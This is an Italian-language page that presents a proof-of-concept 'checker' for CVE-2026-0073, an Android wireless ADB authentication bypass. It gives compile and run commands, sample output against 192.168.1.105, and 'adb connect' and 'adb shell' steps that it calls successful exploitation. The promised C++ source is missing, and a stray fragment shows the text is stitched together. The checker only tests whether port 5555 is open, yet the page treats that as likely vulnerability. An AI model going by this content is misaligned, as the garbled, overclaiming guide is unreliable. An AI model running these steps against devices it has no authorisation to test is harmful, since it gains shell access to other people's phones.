
CVE-2026-0073
CVE-2026-0073 è una vulnerabilità critica di bypass dell'autenticazione nell'ADB wireless di Android (demone adbd).
Un attaccante sulla stessa rete può aggirare l'autenticazione TLS reciproca e connettersi al dispositivo senza l'approvazione dell'utente o un precedente abbinamento.
| Elemento | Dettagli |
|---|---|
| ID CVE | CVE-2026-0073 |
| Gravità | Critica |
| Punteggio CVSS | 8.8 |
| Componente interessato | adbd (Android Debug Bridge) - Gestore TLS |
| Tipo | Bypass dell'autenticazione |
| Impatto | Accesso remoto alla shell (utente shell) |
| Corretta | Bollettino sulla sicurezza Android di maggio 2026 |
Corretta in: livello di patch di sicurezza 2026-05-01 e successivi.
shelladbd_tls_verify_cert()L'errore si verifica perché il file CVE-2026-0073-Checker.cpp non esiste ancora.
nano CVE-2026-0073-Checker.cpp
Copia e incolla l'intero codice qui sotto nell'editor:
Salva ed esci (Ctrl + X → Y → Invio)
Compila di nuovo:
g++ -o CVE-2026-0073 CVE-2026-0073-Checker.cpp -lssl -lcrypto -Wall -O2
./CVE-2026-0073 192.168.1.105
Ecco esattamente cosa vedrai se il programma C++ funziona correttamente su un dispositivo Android vulnerabile:
╔══════════════════════════════════════════════════════════════╗
║ CVE-2026-0073 PoC Checker ║
║ Android Wireless ADB Authentication Bypass ║
╚══════════════════════════════════════════════════════════════╝
Target : 192.168.1.105
[*] Checking 192.168.1.105:5555 → OPEN
[!] Wireless ADB Port is Open!
[!] High chance of being vulnerable to CVE-2026-0073
Next Steps:
1. adb connect 192.168.1.105:5555
2. adb shell
OPEN in verde → La porta ADB è in ascolto.Esegui questi comandi:
adb connect 192.168.1.105:5555
Se dice:
connected to 192.168.1.105:5555
Quindi digita:
adb shell
Dovresti entrare nel dispositivo:
pixel8:/ $
Questo è lo sfruttamento pienamente riuscito.
Questo PoC è destinato esclusivamente a test didattici e autorizzati.
Puoi utilizzare questo strumento solo su dispositivi di tua proprietà o per i quali hai esplicita autorizzazione al test. L'uso non autorizzato è illegale e severamente vietato.
Utilizzalo a tuo rischio. L'autore non è responsabile per eventuali danni o conseguenze legali.
🎯 Realizzato con cautela — Da usare solo su dispositivi autorizzati.